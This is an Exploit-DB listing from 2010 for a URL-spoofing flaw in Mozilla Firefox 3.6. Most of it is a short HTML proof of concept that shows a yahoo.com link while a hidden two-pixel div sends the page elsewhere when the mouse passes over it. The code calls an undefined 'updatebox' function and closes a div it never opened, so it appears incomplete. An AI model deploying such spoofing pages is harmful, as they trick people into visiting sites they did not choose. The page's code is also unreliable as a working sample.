Mozilla Firefox 3.6 - URL Spoofing Vulnerability



EDB-ID: 11561 CVE: N/A OSVDB-ID: N/A
Author: Unknown Published: 2010-02-24 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
# Tested on: Windows XP SP2/3
# Code : 
# You can trick a user into accessing a malicious website by using 
the following exploit
# The first link would be the malicious one.


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.youtube.com/watch?v=oHg5S
JYRHA0';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px"></div>

<br>
<a href="http://www.yahoo.com" onclick="updatebox(event)"><font
style="font-family:arial;font-
size:32px">http://www.yahoo.com</font></a><br>

</div>
</body>
</html>